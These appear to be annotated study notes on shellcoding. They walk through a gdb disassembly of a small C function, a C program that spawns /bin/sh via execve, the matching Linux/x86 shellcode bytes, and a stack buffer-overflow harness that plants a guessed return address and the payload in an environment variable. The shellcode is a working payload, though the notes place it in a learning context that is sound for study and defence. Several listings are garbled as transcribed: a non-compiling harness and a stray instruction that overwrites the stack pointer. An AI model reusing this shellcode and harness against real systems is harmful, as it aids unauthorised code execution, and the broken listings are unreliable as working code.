shellcoders

C/C++、操作系统(内存管理)、硬件体系结构

or eax,eax		// if (eax<0): OR of a register with itself changes nothing but sets ZF/SF from eax and clears OF
jge label		// taken when SF == OF, i.e. eax >= 0; the fall-through path is therefore the eax < 0 case
// gdb disassembly of triangle() (AT&T syntax); compare with the C source below.
0x8048430 <triangle>: push %ebp
0x8048431 <triangle+1>: mov %esp, %ebp        // standard frame: save caller's %ebp, new frame base
0x8048433 <triangle+3>: push %edi
0x8048434 <triangle+4>: push %esi             // %edi/%esi are clobbered by movsl below; restored at +57/+58
0x8048435 <triangle+5>: sub $0x30,%esp        // 0x30 = 48 bytes of locals (array[5] accounts for 20 of them)
// Copy the array initializer onto the stack: %edi = &array, %esi = source, DF cleared,
// then rep movsl copies %ecx dwords.
0x8048438 <triangle+8>: lea 0xffffffd8(%ebp), %edi   // 0xffffffd8 = -0x28: destination is the local array
0x804843b <triangle+11>: mov $0x8049508,%esi         // presumably the {0,1,2,3,4} constant in .rodata -- confirm in gdb
0x8048440 <triangle+16>: cld
0x8048441 <triangle+17>: mov $0x30,%esp              // NOTE(review): as printed this overwrites the stack pointer; rep movsl takes its count from %ecx, so this line is likely a transcription error
0x8048446 <triangle+22>: repz movsl %ds:( %esi), %es:( %edi)
// area = width * height / 2
0x8048448 <triangle+24>: mov 0x8(%ebp),%eax     // width (first argument)
0x804844b <triangle+27>: mov %eax,%edx
0x804844d <triangle+29>: imul 0xc(%ebp),%edx    // %edx = width * height (second argument)
0x8048451 <triangle+33>: mov %edx,%eax
0x8048453 <triangle+35>: sar $0x1f,%eax         // %eax = 0 or -1 (sign of the product)
0x8048456 <triangle+38>: shr $0x1f,%eax         // %eax = 0 or 1
0x8048459 <triangle+41>: lea (%eax, %edx, 1), %eax   // product + 1 when it is negative ...
0x804845c <triangle+44>: sar %eax               // ... so the arithmetic shift divides by 2 rounding toward zero, as C requires
0x804845e <triangle+46>: mov %eax,0xffffffd4(%ebp)   // store to area (-0x2c(%ebp))
0x8048461 <triangle+49>: mov 0xffffffd4(%ebp),%eax   // reload area as the return value (the store/reload pair suggests unoptimised code)
0x8048464 <triangle+52>: mov %eax,%eax               // no-op as printed
// epilogue: release the locals, restore saved registers in reverse order, return
0x8048466 <triangle+54>: add $0x30,%esp
0x8048469 <triangle+57>: pop %esi
0x804846a <triangle+58>: pop %edi
0x804846b <triangle+59> pop %ebp
0x804846c <triangle+60>: ret
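/*
 * triangle - area of a triangle with integer sides: width * height / 2.
 *
 * The local array is kept on purpose: it is the data the disassembly above
 * copies onto the stack with rep movsl, and the stack layout of that local is
 * what the listing illustrates.  (void)array silences the unused-variable
 * warning without changing anything at runtime.
 *
 * width, height: the two sides.  The product is computed in int, so it is
 *   undefined behaviour (signed overflow) when |width * height| exceeds INT_MAX.
 * return: width * height / 2 truncated toward zero, as C integer division
 *   requires (the sar/shr/lea/sar sequence in the disassembly).
 *
 * The parameter type of height was mistyped as "in" in the transcription.
 */
int triangle(int width, int height) {
    int array[5] = {0, 1, 2, 3, 4};
    int area;

    (void)array;
    area = width * height / 2;
    return area;
}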
  • 获取shellcode 代码

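    // shell.c
    //
    // Minimal program that replaces itself with /bin/sh via execve(2).  It is the
    // C counterpart of the shellcode bytes in the test listing further down: the
    // payload has to reproduce exactly this system call (path, a NULL-terminated
    // argv, and a NULL envp as in the original).
    //
    // The typographic quotes of the transcription are replaced by ASCII ones and
    // the headers declaring execve() and exit() are included, so the listing
    // compiles as written.
    #include <stdlib.h>
    #include <unistd.h>

    int main(void) {
        char *name[2];

        name[0] = "/bin/sh";
        name[1] = NULL;              // argv must be NULL-terminated
        execve(name[0], name, NULL);
        // Only reached when execve() fails; the original's exit status 0 is kept.
        exit(0);
    }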
  • 测试地址代码

    // Test harness for the "testing the address" exercise: it builds a buffer
    // that holds a guessed stack address and the shellcode, exports it through
    // the environment and starts a shell from which a target can be run.
    //
    // NOTE(review): as transcribed this listing does not compile -- buffer_size
    // expands to nothing, the string quotes are typographic rather than ASCII,
    // and <stdio.h>/<string.h> (printf, strlen, memcpy) are never included.  It
    // is kept here for reading, not for building.
    #include <stdlib.h>
    #define offset_size 0
    #define buffer_size
    // Shellcode bytes.  \xb0\x0b / \xcd\x80 are `mov $0xb,%al` / `int $0x80`,
    // the Linux/x86 execve system call, and the trailing 2f 62 69 6e 2f 73 68
    // spell "/bin/sh": this is the machine-code form of shell.c above.  The
    // bytes are copied with strlen() below, so the payload must not contain a
    // 0x00 byte.  A fixed byte pattern like this is also what signature-based
    // detection keys on.
    char sc[] =
    “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”
    “\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”
    “\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
    // Returns (roughly) the caller's stack pointer: the asm leaves %esp in %eax
    // and the function then falls off its end, relying on %eax being the 32-bit
    // return register.  That is undefined behaviour in C (no return statement)
    // and only works on 32-bit x86, typically at -O0.  The harness uses the value
    // as its starting guess for where the buffer will land, which is meaningful
    // only when the stack sits at a fixed location -- exactly the assumption
    // that address-space layout randomisation (ASLR) removes.
    unsigned long find_start(void) {
    __asm__(“movl %esp,%eax”);
    }
    // argv[1] overrides the buffer size, argv[2] the offset subtracted from the
    // stack pointer returned by find_start().
    //
    // NOTE(review): `buff` is declared but never assigned before it is written
    // through, and the printf format %x does not match the long argument; as
    // printed the function cannot work.  The layout it intends is
    //   "BUF=" | shellcode | guessed address repeated | '\0'
    // handed to putenv() so that any program started from the spawned bash
    // inherits it in its environment.  The whole scheme depends on a fixed,
    // executable stack: ASLR invalidates the address guess, and a
    // non-executable stack (NX) stops the copied bytes from running even when
    // the guess is right.
    int main(int argc, char *argv[])
    {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=offset_size, bsize=buffer_size;
    int i;
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    addr = find_start() - offset;
    printf(“Attempting address: 0x%x\n”, addr);
    // Fill the whole buffer with the guessed address; the i+=4 step with long
    // stores assumes sizeof(long) == 4, i.e. a 32-bit build.
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;
    // Skip the first 4 bytes (reserved for "BUF=") and overwrite the addresses
    // there with the shellcode; strlen() stops at the first 0x00 byte.
    ptr += 4;
    for (i = 0; i < strlen(sc); i++)
    *(ptr++) = sc[i];
    buff[bsize - 1] = ‘\0’;
    memcpy(buff,”BUF=”,4);
    putenv(buff);
    system(“/bin/bash”);
    }
